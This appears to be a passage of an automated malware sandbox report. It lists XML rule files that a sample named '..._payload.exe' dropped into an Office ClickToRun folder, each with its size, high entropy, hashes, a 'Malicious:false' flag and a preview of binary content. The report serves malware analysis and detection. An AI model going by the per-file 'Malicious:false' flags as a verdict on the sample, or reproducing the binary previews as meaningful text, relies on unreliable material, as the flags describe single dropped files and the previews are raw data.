                                                                                                                                                                      SHA-512:28515DDF7EBB435E82B3AD7E80441B8DD50CBDDFBADE0AF3399F946BA14628847FC38F7EB3F166D6F99EA6830FC3D606409B4526DF94B3B6A1CF610B1CB44F87
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.:..<U.).....l.......>W2....3...W......%6!...~..T.`T.*2..hU..F.C.:....O...F.........TN%..)...$.Q{d..)u....-.h....6^._.F.GS..s..I...h.................p.../...?.I......{..8...=..WH!.......Q.....R......UI.}%.!.o.B..{...r_h...T.0..A...5.{G#..T..$V.B...;9...-m.1..>......Z...&...Z.l.0J.....~...`...sq;.".<....4......&@...QU....%:.L..u.b.u6)x.q...y..m!0rw...H..2H.~.wt..~^...B..W./B.+..@I&m....L.d.Z...(}Oz|...{@I...26U.4.*..V.`s.y.b...}F...B..j.`..8....:7..km./........s...G....>:.|3..Z.. z~.mQ.....H.bW2z.E.o......s..qL/I-.....d+f.[.0..%H.q!..n...,......3]:..;...Y.nP.0.e.Z..Ry..m2).@..IR.R.]5..T8.$.....'...<...uz..I..$..L...ec.k9.R.9...4r.E..X....&...K.)i..FVf.t.....~..X.9..`.K.'....\B.<ZaE=g...W.1....a...Cf..W...m...{`...q..^.".rH..z.g2;.|iao....L./....).Uc..Vq.Y.(.=............E/..9.....,.E.6....y`?.l:..w...*.9J.7l.j...:13\a.$..T..%Q.u.. .j.. ...%|...w.."~.......8`..".M.p....[.,[...V.W...L..'.j..\...`...cbg...*....P.Z./y~.c..N1i~.~...p.mf

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703101v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1727
                                                                                                                                                                      Entropy (8bit):7.882112355262463
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:eGjL3g2TAYvuxEdxB02/Spnn3ckVS3HTGNlID:e6g2/eEdn09pnnMk4jWlU
                                                                                                                                                                      MD5:C9526473CC0AAD1BFC185159B4EEEE28
                                                                                                                                                                      SHA1:CE295E94931EE4821803601B35E0B7A46385F476
                                                                                                                                                                      SHA-256:7303B2230A91DC519A6D6062615827BEF267154644DC98DCF4CCABF0295E4C62
                                                                                                                                                                      SHA-512:3BB3BF737556964872736F7C9AF58017C4BA42DF6CBFE9292FDB9231DD41CB4600F9D748D0302E60AD0C27FFD7F59384653E490C1C98BAB60EE3EE713B1BCE70
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?[[...=.aN....H,`g........=.#.*.y.".?P...M..i...q......6...=L.-.{....g..`.........^...9.2.R..t".r\G..8.._4..6...:.,...5.J....D$5m..O.y.....l.2bHg...e..}.-.?.I...:.....f.."g.r...].OBA...>t~8^.]$7.v..;z...O.rEK...B.....R..p@...H.l.t.{.:..y.......Y&..9..>..).-..f..b...`.....N..WaG[....dK.q.E..t.c0...l.C....~Y .....F.....w.r.+...i.{v&..U....k.....:.`N:...W[..$.\3.].!...U..+Q.....J.QrCA..N.....Xp..a.s...eP'..W.\)!...f....b.K.A..:......m.......@.4......N.8.v..s.s1..?9.>H...>...'...?.F.<.....p....=..t..d.....9.;7.....nJ...q..!4...+.Af+...E.........n.....:.o=.T.m...<$......-...R.....Y...g.]..r..M.Ec..6.~.%G....b"?.v.....u..3)..b._._....c..I.u......h...8...B..CS+&..t..h...[6..a/?...M..G.8p...n?...s2.o.xFr.o.Y'U.....'O_.^...z....(z8<.......B....Ng.a....S.0.+j.F_..$M.{.{t..9..O@K..8.<7x..Qy.h.I.....!?7..Hb......g.E.@v.w.uZ..1.......Z...>d/2.;.G......t.>P.d^.....{I%..W.....4....-|......P=.D..I.t..Cz......=.._../Z.2.g.+.#....m.'....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703150v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1708
                                                                                                                                                                      Entropy (8bit):7.881696587137848
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:G1KFk/w1NCuixKL88Fk69Umf3PP88pwc+/W3bU+MY/D:G1K2ONCu+KL88F/5f/BB+u3bzvr
                                                                                                                                                                      MD5:618CD792E837D225B33A467CDBC01D67
                                                                                                                                                                      SHA1:F294B1A2514DE044382BE064A686711BA8BBA09F
                                                                                                                                                                      SHA-256:A2BC79635AFF1A07192223BC7AC48EF2767E0057B76E3D28530B1BCA742774CC
                                                                                                                                                                      SHA-512:36F50974F2E0C29652D5DD9A3D650C72FB178AF68920307E68A20936F55EA49982C8D208C51B745C79F6F95D995EF07A8C013C4FE971EEE72BA8A6A42409C327
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.....i\.A\...l...]U.>.p.../...O.......0se..m.....I.xzB.....r.;....'*.|`...9.A$g.....|...ZG......!.....df...E.\...iNc....eH..p..+U.....)..q..>...L7....&U..QJr.#...'..adS.9e..Tn..|.c.A..nX.n^.9<.G......E.=......v..x....zD,.eU.D...g.qje[..}.k.z...\.dU.U{w..-,...8t/.....z.B\.<.{M.....O.IV..-..U...NU.4..%..&.....o..4<4.Da...Y.s6.G.4-.<>...Wg.^..t.Z.....fa:X.rF....c.......=g=.?T.....m...'....ME1...>.9.%P...6..gt& 8p...D\.....?.'......\.@C..IC-..;nA.A.........`{a2..Um: ... ..z...K.g.~...yi...w.US....a/a1O.;\.....].{|....o..23.lW.....g...l....8`v..`.MI..V..........T..2bX?...;....B..I&.-.LZ..:.......|..$_..*>k%..%..`..0.......q....A..My.]2...jJ.".C...*-.r...^./.<:..Q...Q.t=..^.....K...f.7W...<..{o.c..,..Q..bwml......&.r..E...G.nu...}.G....".....6X...9.R15...8.....}.!m_u.#V.s@a.[.g..i.p.k...?..[.....?....$..........'../...&3....j!....z..8(.........Q5R<_T.Y4iX.......|.C....j.dp=..@;.7b.....t.....y.kks=......I.u.n.....k...$.o.p.?.IO.2..._..$,Nt

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703151v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1745
                                                                                                                                                                      Entropy (8bit):7.879867795625198
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:dzLCoSwy2vxpA7WW9bjUSz5fRwbGgfvxQvSk2eMyRfu+i5w2D:d/Co3JvrAyW9Rz5fRCGgHWvS6fuNV
                                                                                                                                                                      MD5:E26503706B64AD7B8A5D773DFE84EBF1
                                                                                                                                                                      SHA1:094AC59F2335CE5B024EA59978DA721FCE05AF53
                                                                                                                                                                      SHA-256:8474839F989A6C2FD7CF3BCEEEE274F4F1BE234B96736FA9C9A327DF1B3609FE
                                                                                                                                                                      SHA-512:91506B445A4A7CDF07CD8FB14C309B23C7AD7A49E54E0D55895397E4080447F8EE68F1E1DEEE54DF535885FCE21E0A88FA9CCAB02935D7B26355DAAC1C6E21E8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.G.H./F.H...>...FuI.B....04.{O..._4#/cJr.Q...`F....`.9s.RY!K']9...p..^0.#l..`o)o.:C9.......a.A..../.h..#_.v....X6..O....2\W..-a.VJ.pZa.t...?.v.!,..........uQb....0............2...y7....`..t.p..r.96/^..G<&.W~m.N..Kg..v.&/......sk.NS.SKN/....+3.H.M./gVd .0t.{...1......)I.s.....D.l....h_.d.O.M....b..n..6..UsV.Y.Q+.....=.5.........&..y..L./..M......G.%U...,./.:.`..c..gu.cmM./..na/."......Y...:.3y.;.\...R.Dv...~z.VQ-.....4....*f.|.....&.....5T..S+N..m.c..h.0q.....C..`..">...9H..1...l.)..]s.?.qc.[.$..<Qj...'d4S.......zZv"...@.I.K.+..3......eu..Fl.1A.0...!.%C....a....:.OX..%2..G....w..)..D-..[..8.._O..J0..m?.m..kq8.F6!O..DE..z...L.Fi.tr..J..V......-.F...Ld........+.I.P2}(.'nm.IB.X{%......@.....Y...]ZM=2..|'..u..-n.Kt.\..KR.N.`S....Yl.....k..45..!...L4.E]........3N.]0d..u.`A*Z....&.......q6.. .%N.UP....42..Wv<.....B.u...;...t....s<..,=.\.pW..s.9..Uf..Qg*....?.u..hf<`...<c.g.T.^@...4...u.l...H?U..*4T.4.9.......y..5m....F}/.M....*........~.U..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703200v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                      Entropy (8bit):7.869733460711035
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:XD6kdUbAcdW0QKgMokDGnO1iroSOISYahU1U/D:YbAOhoMokinO1ThISYahU1w
                                                                                                                                                                      MD5:396C5B8A8459B633F712AADC2946A59C
                                                                                                                                                                      SHA1:B7BE71046B5C5440EE09ECC537ABE8BB3BB0AC67
                                                                                                                                                                      SHA-256:A3977AD2CF4DC571BE253E240A9515ABB6190E250EEB7674E027A5FD4B8E9A1A
                                                                                                                                                                      SHA-512:14A41694BCD101BFEB8810977475A543CAC9F32641033CB1325628B8F669DDFC231543A4B3D42ADC795F52986BF755F78A4DF9A553EC3B561E94AB71AA9BA904
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.\..?".0.....BT..?..T{#.E.cbj..6.......Y).[.H!bT..5.e...NR...l.y..Q..c@...RdGh 0.....m.PLE`-{8H...."..@......![^ >"...z.b..R.Q....@.r..Y...#.{'M.-B..}..!...$..>.Ku....~......... .>..ne...L.38j.-...m...{...)...n.....e....$...m....V-E....by@/9/&..)K...G.-.1xME..&.*.F.-..Y.`[Mb.....q.^....7.^.)C3i..33.:.......~.....J..jth.k=..A[Nv..X?9.#...y.={B.t.P{X..@.B...M..XD..;7F.$O...E,...rr.h.2w..5L....d.;e?q.H4.J..(....?.<.....d........_....J>.........`..z.!A.Z.Z.......v.......#.d...y.....F..Y.....y.=.a...r,....+04..|.....v.e....R....c......=.Qj....<I.W=p....."8.W#C6.r.r.F.>...M..2.|.b.~...4.....D.....zL.`...c.N./.).G......S........N@u..i#..X|...=..2..&.7..fmt.............9.;.#.....v..aX.T?9.?J../=.$.].q.D..-Q.#....D1.m.S..8....:y.3...~\......v-...[,t&nh]....E..........Aw.M..+.3w.R[..lZ+.^..P*."....3..{3e/yy.1..`HzF........_u..r..!QA..?./...v.q.sQ..@.B.s-.@....4\>.......+9....Q.T..z%E...}n.>.w.....E].......:....*..ENz... Y..phH.!...#....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703201v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.870135973194768
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2vdakq8PKZBmHYwz+uWcT3v+dBJJidPTanCfD:A+8PKyNP52dBjidrqC
                                                                                                                                                                      MD5:5BD366EF988AA8EA928B60547B3A11E6
                                                                                                                                                                      SHA1:87F01843A3F599A496ECB91CD343B7B2DF27D3F7
                                                                                                                                                                      SHA-256:F9918CE4DB82F5CA1238949CDCDD49FB618E13DC588072CA76B05DEDAB9F8E98
                                                                                                                                                                      SHA-512:70BE5889F3445FD93B29750C32433F022AD98D891D8955E82BC7E727FFEB847755B335975A66AB99E190E3DBF9250518D79460236A27C7D3EE6425488BB2471A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..Y..T..x..,.......D......$....l.FMwJ..RpM."...'.z.................N,=f....|.......Z...@...SA....\.T.Bo.......0..~_...e3.Sz..1.......f..e2.!.......~.C.& ".e...5.........~.c.BR......X.M...4.@=.....)R...(..P.....<..WG..Z..8.f..O...{P.M"...T.......]W..3..2.....6..........,..w.N.c.Z.,.N.......3...(g..T.........G.n.ARxWjy/..=j/Ph.K...mH.L7......;A..{....h..l.R(H...#...Q...y6.w.:..._...()..?dY.i..N.2.0....:...Sf.r...kM........m..X.T.7.w%\..~=...c..R....c......aUz..a..z9X....].ll.......C..1.S.u.._F.P]..c..+.Y..)...br..3.D....].a5A+..d.:.i.R..j..0...c.g&....6.G......].ZS...H...0.|$k...u.9JF....H..%..L@.].......d.dX2...e\].zO.+.p...M.....R....0..sh.j....n..z.k.L...IEC.U..=.....I.Q....h.;..IP...L...$J`..U...%..X.6*=..C...#W;..~.q].e..}.~./.z...l.-...;.F.A.&r9.......!.R.._.. ....x.........7....U...fWh..~.._.+.(..D0..4aV$.)...=.W..%<.....~..|..J...3.u.....t..&.:.2...t.../.... y..Q....y].........n.}..[...*...oai.k..!....T..u;.J..|.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703250v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1694
                                                                                                                                                                      Entropy (8bit):7.895755616857957
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:SgQA7tOpWPKt5J4ygohnTAo32xIS0Eii9v4AN6rD:Sgj4t0IUVyS0EiiJo
                                                                                                                                                                      MD5:E698FE6EE4BBD57D30CF74C2F13522E6
                                                                                                                                                                      SHA1:CE01000CCE32788EEAAF27430CCE298076CCF933
                                                                                                                                                                      SHA-256:90FEB061A3CED133D9107E8BF3B50CDB2FB569AA7E887CC296F583C9265D705A
                                                                                                                                                                      SHA-512:5EE205C7C58B374FFF3A347DE2A424D46A3601B669BA709E355217374650F8FAC35014DF65E49D06D70E88DD270D338341DA3F39915D3AF8F5C5A57A793D85F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?!..c..2.....3..G...IK....-..!.Ep..).9b[Q.....k_Y#o....|.....G...jz............b..U.G=.\..Yt..9$.\......';.`x..O..e..y.....E.*.....N.hM.p..g...T..%..n....F.W{.....H.,%.)..L.Yc.f....J.#......q/S=.C..Y..A.5".&.`....`7y....q.\;...7...T..f..|fG.^tx.C..w..kL.V.../..=V.B.16..O. `....).\+..n...."BW...!.k...........@q+....:e,.tB.[.l.B.X......i.qGq...p....xL..t.h........b..y..X.......y_..V.a.R...]i7._.R.H.X..<M...R.z..t......:....$].j .g...O...d..&.....T..$...8...Rd../.L,.....V.i..V.M.=./.#..C.<.S.=....j.#......72.-.c...-B.....~.$.C.>.WS.6..@...G "..(6.<VB'...?H/.9:._\k....h...#.Z..%.3.Dwk.XP..."....o.vjQfq&.v.......3..3.F;.../..7/}...a.....p.ja.GxSb.......A...Q.."Au(..)...,5sjh......O...Q...iY.R.......J.Y?..pK.....<.rt...W..q...!C....\..^+.M.}~.]D.rkq/.]I.Y..........([_?2X:..\.WSV..S...[....1.V...d|.?W.&..f.N....E.Z$'9.l....L......,v*F.A.!*.......X.{.ze...s.O.D..r![.3..#..e.h.d.e..w.?.(F_>..n..X..M...2..N.`&.....#..].s.xjf..;../../

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703251v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1731
                                                                                                                                                                      Entropy (8bit):7.878073463892154
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:27c1ZO1Gv2pxUDvq6nNTIR9j49gGe0eSO9GD:2A1ZYpxU2GNTIRQESO9e
                                                                                                                                                                      MD5:53CBE784231A38D500AD28FC4F424D46
                                                                                                                                                                      SHA1:FEF5EFE43677101BCB7C041DA50B4AFD9C3ACD56
                                                                                                                                                                      SHA-256:2C6F09AC3A64438FF36D992FDC5215A4860CC2B646342D3EDD4A2AE15FA3E1B8
                                                                                                                                                                      SHA-512:378357D5A2A1FF3B07F784E4C5E0E4B24015C6116CD1D861490C7BE88DA65D7DA4813644E940DF9090E07BA44F0D099813A4DC92538CB4DBCFFFEC49B64C460E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.X..I...!|Y.N..=.....~Q"bp...A.k..l.x..w(r..I;..O&V$....s....-.........e..@O.-..a.&.rg..i..W....c...~s.i..&.....C....)C.C.e/...w.......P....".....6&.U.a.=....<'..".(/..._.... 9,.%.$.D.... a........W{..2.*L.....J....4...PdTb..\..<..MPu.N-.0....&....;"o....u.U.....@.....ZV..F0 .L)J...a.L.4l...tWZ...l...g..].G1T..h.....?...(.....[.w.)..v.......6.s.._Bg.0..57.i..M.Y-.q.y .{.A{.:q.kd.e}...^....d?......+Vfc..*.`)..3..o.%.h..y)>-.w.?IH..~A.........5.=_...Al...Vz&....*&).%W.L@.........Bsg.o....,.....i.4o~6..S~.?.3..@&z....+..<x.....4.^@{.D.).....%...U....UDMMes'p88.y...7....r....:........W.A.CT.T.3.cM...a.........$.....l .2O....).aK.l..sK,..VB.m...k1.....SN2..wd....!.9{.s.`.......o5.......nf]pP.i3.!..`.X.Z...'....lk}.........\...'~.n.).'O...*..bXq^..~...*....|.x6$.D..mc$.D(....a./_.W..z.eh.R@.....,..m..P..M0R.......r.I...K.....b...M.....l>...?'....y:..X-...y.,@.J...8.W.=8..iwY;[.....5..x.$kHFsQ...!........V.Y.....7,..Q..5"..w=..T

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703300v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                      Entropy (8bit):7.8790764965762845
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Fv5rrEf/1ojYU4fp8lwMqz1dyGsX+kOxAdX/aRMG++X6D:B5vC/9B11dyrXpms+C
                                                                                                                                                                      MD5:3B5A2AA7088527345DEB19EF2ECE056B
                                                                                                                                                                      SHA1:5F2598E83DDC7D675C003345AB49443B88EC051D
                                                                                                                                                                      SHA-256:C8B358FD55429BD17ECA7465D968AABA77EFA89826BAFA42D7755DFA96BAFDA1
                                                                                                                                                                      SHA-512:A7E6742F0AD307110CB32218FF6478AB5B75EC49E1D514F784BA3FAF2A60CF0FF5B9EE60081BE62D52C62135362D2B666E969A3B7021533E3EE4A040DB3CEEB9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.J..........>...KN.juB.......#.R.......+...;.CG^.Mt.&M9.$K......p.#..{.@.E.<.....1,..,(p..D..Q.d.?.PM...'...q...T*...K.47..n7!.AP....P.....IW..&5.G.J..u.........WP.,./.AH..\.v22...+.;Ut./^.4.f..WJ*..1..9..K.cC.....BQTht....1.....V..yg.U. }......d..$..19?.#f>9... ....@.)..{..@.t{...._.......D'.....CU.I.Rd`Y.U.....e.f.]$.....a..{.e.OM...s.BZ0..(.....@...Z ............Q......8...Sl..).+.z,e..........`I..Z..qw......3.....:GY..Q.$%.l..oz....`...3..S...b9}L.~...{../.+.r...Z8.~\T.U[..k{e.0.?r/..-(.Q..h/.Hi....j .-........<.1Q.<..ff.2..,.5............... ...]..j..!.....N.Q...Q"..7j......y...3...<p.>..CA.i..K@..m.......Fz.#.X........b.w.[........Bi\.Q..>U{.#Cp.{s...s..Ue......_>X.4.xCh....4U.e<....=..$o..e.p...+.I.X.!..c..x......?6.k..m.l5..FXY..@Bx#*..q...c=......z.{.......r..]g./.......................v..g.)..k..=.R...(....w....._...u4.H.s&.`..O.h...X.u0.....~S..b.e.w(.R.....=...5#....h^...Q{....#d.L..L.7...h*.88b7p...O.=.Gkauc..Xs.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703301v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                      Entropy (8bit):7.888382310890375
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:w+pUjTNOIydGDKD3SD3LFevAQ/Qw764fyVMuUX7rDmbvPybTL3hmdia+7LBCU7XE:OkGdFIAQ/5yOuO7ubvPITLsdi77dgi2D
                                                                                                                                                                      MD5:D8267B7AA02489C18C9AA96AF2DCBE16
                                                                                                                                                                      SHA1:C91480695BACA905C09526B867894E85A44FC032
                                                                                                                                                                      SHA-256:0649A8B7AF111D251A519F5489FC913BB59600EF2B911A4DF2D32285A4AC09D7
                                                                                                                                                                      SHA-512:F3B4BA109A3096EAC0055AE09AC76DC3CBE513C44B6CD7FD03A45D9CFD169EA0F1E7FDC5087AA13814855FDD350062C9386CC6BA2D57D39FB8271A82FA030599
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<? $.g.......9..l.W....U?....9.[`.ow....J.^..wYh..\7S%....k.....]Y..7&........k..v..'..}.[3..7.1T.9..9eqK...[.N...R(..H...9...&....0.~.j5....L...i.t.!.f...n./."k...]D.q.U..*..*A>..q.v..f. P.T..[.|6'......U.!...e....R.ms< ..?`.~*rFp.Vj.*....c.5n.=.A.k..6....>.#]t...%..V...t9Sy...!....f...O.b9.ow..a.G/...u...tG7#l>.!.qL.'....4~..V.j..m..,.b.....|y..rL..U.~..Ir.d..Y....Z..gxl.....`5H%.W.....!x.....A.d.......F...j...dH..9*....K..iG.....b=.7...3...U.U=..Y.$. .R:....g.7R...I.....p..p.OS..Sk.Y...,9...t...O|....{..4BP...^...,.((l...}-.PF..##.~.(...OD8..Q.4...b..w6.."A..T.4....`]zc..Q...?6...{.....=..C....E.G.t[..2.Q$.......(.....Z&.O)..8...5.%.!.......]\p...=J_Q.......I-.....3a.v....J...r@CS..........F.#.....+>...H"<.tT.p.$.mapqf83.,{...ET.^q.....8..:..7G.i.yOK...h o.l.@...'.`?..k.R...^...t....J.....4$j..|$....P=.<...B@..8...4...T.~*.8...R.k...1.T..q...M...?..x.2z*u...4..mZ.&.@p.b.n..+...?.{w......A...1.1..]..o$W>`.a.k....-2q[.0Y..1.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703350v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1700
                                                                                                                                                                      Entropy (8bit):7.860540543321976
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:XFavfubJ0IGh0dUzF9+jEwOjTFJcZGXby92/jJV92w5FQfnTczqci8bg/r7Ob0Sv:4vWCIG3zD+jEwYTzE2/92Km6MegSjD
                                                                                                                                                                      MD5:0BD4EC6868D189D4B2B4B0070B7266FC
                                                                                                                                                                      SHA1:B1984798407CB964E1E4745221DD66548C71CD6D
                                                                                                                                                                      SHA-256:9E88573131BC7CC073F01F05C8B286D7943BCAA3C572B9180EDD4EB66B3E472C
                                                                                                                                                                      SHA-512:419B3388AE9B55FD4F1C59058212053891E2BB2550F38A4D33ED8BA5B7175CD59F864B0DE629DFC43788407D8747135F0BF6707D179E84A780192B12DBC6D393
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?f....`..eM_.a.;....C....nN.u.q.....,.uI...).q...... .=H.)..Y.>.%.Mr..#w....Q.Y.e..k...^.Y.y..3...M}...|./...$.'W..W.K.::...H.........}..1.!.....{jY[n...........X.Ew..|,...Q..|1.h]g.....zt..'.GE.T....O.j......q...(..F...0........-.&?=......Ga(.)....2.q"........6y..GH?.@Y..X.a....vUj8.,...wvU..U....U@...d.4......&..w..!'.3.5[6.L...,6.Qb8......p.{..KA.....\..10x.>...O.......U.aI$.}6....u..6..Jn....>{".f...p...H..`..t^..J.......hQ...N.p..a...Z.pXU.*a....-......(...d/.|....~.+^].T....Q.n.QVRG...T....b.8..F/.9.;t...\..5_..r.s..2...R.,b.....eiU].7...{.N..U.......0."......6.G..z+.abX..W..:....m.....`%...d.....Sr..>.....5E\..%....y.-.|.............b...f._U...s.2.(.....O.n..mU~....3.k..o..-P7)...@...=(....@.m..}E..e...;...j.4.3.1....8....U...R...mzBG...h.]8p.K....v...5Qw.8............a....W.m..f.T.+rJGK.:....h..O.......4~(C.g.^......L..5#Z.bn....5..4.........02.e..B..._{.0^.DL...e.k.I75Q@...Ut.]....r..?e.q.g.=.6t.LQH.J.b.....l8....A..*.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703351v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1737
                                                                                                                                                                      Entropy (8bit):7.886080353789033
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:LVG55a1hlP3TUbtGkhRCqgYuyhIJZjSEKk8zj/NbpyDtbC/D:LVG5svlEGk3CqgYuwAPKk8flbpyDNCr
                                                                                                                                                                      MD5:DB4ECFD947476F4E7B17002951500DCE
                                                                                                                                                                      SHA1:008B20DA0E243DE2DC0367BCD6A12A1F96EC9858
                                                                                                                                                                      SHA-256:23BC72E293311C1E35DB41E7A12BA313E216F0EA44165E2C90C442F35EEC6C08
                                                                                                                                                                      SHA-512:C3FDBBAE4AA9BE433D02B4AE5CB6263FC276B768CDBA93DD2A0224B9987DCE987798C3FD1B19AC69ECB2442AC6F02A0FEC08DA324AB533146EE88CA5D163EDA7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?T..K....|.......8p..UC.7m3..$Q0..........H.T../.;.. .K=.mVo.0......}...s..PF.m.m.."...JO..i.o.<M<..@.=j...4...=....c.h.O>. {...q.t1...5h l.>m./I....)X..r.6....N]...r.r...=.S.C..k^N&rwL.-._....b..|.....m...l....H.b.q:.F.....q.....c.)H..P<9...c.T....]f.L..Z.......P.Z..K..........+.Z_.b....s.[..3.>.....(.LX..F~..>..f+n(r...E.........{..F.o...........s.z.G.6....G:..&..>r`.b2..O..y.C....N.../..:w{.?.@..%.&g...!.}l.(...3..BBT...~..lVM..C....%p..$..l..l..UB..!.L...YhBT.s..p.,bz...........{@..Pf.j.MX....-..C..,|#c...P..1k.A..w{.l.t.j#..6. .5q..c+......<..v...=3t.O....X..y.|....*S..}.v/......e.5Va.......A^%..y..m..2.AK..G+h..~.P.6._9>xA..w_C?.....H....:..0+N....C..}.\\........#6.=!..|.y.Y....5..?....z.e..-D/cj.U...#..2.z2..v4...wJ....'.2..)}.O..V.#n_...q......WU.yD..:B.S$..uG"....F.J.)~....L.tTQ.$...p..M...x]..TH..7....i[zy.t..2.../....@...nFu.=E..\.g."......q...r.......z..W.%.K.0S.5.....2`..^7X.m.2:..Qi..$..UryKK.....N.9..3W[nA.>.1.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703400v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1722
                                                                                                                                                                      Entropy (8bit):7.859167694960135
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:POrL29NP3q2MjdWH9h39PY/MWnjc3sO9V0D:maP3q2MWZ8M13j9Vg
                                                                                                                                                                      MD5:8E3BE9F6623BCFF37BAA63D0E08BF353
                                                                                                                                                                      SHA1:0FB3B8A500CCCE9F0D68FD87AC1D2824D9EFAA15
                                                                                                                                                                      SHA-256:21F9C1685890EC4A4B336B2F90E31C247F3B94C601394E6BCD336BFF7DF8A722
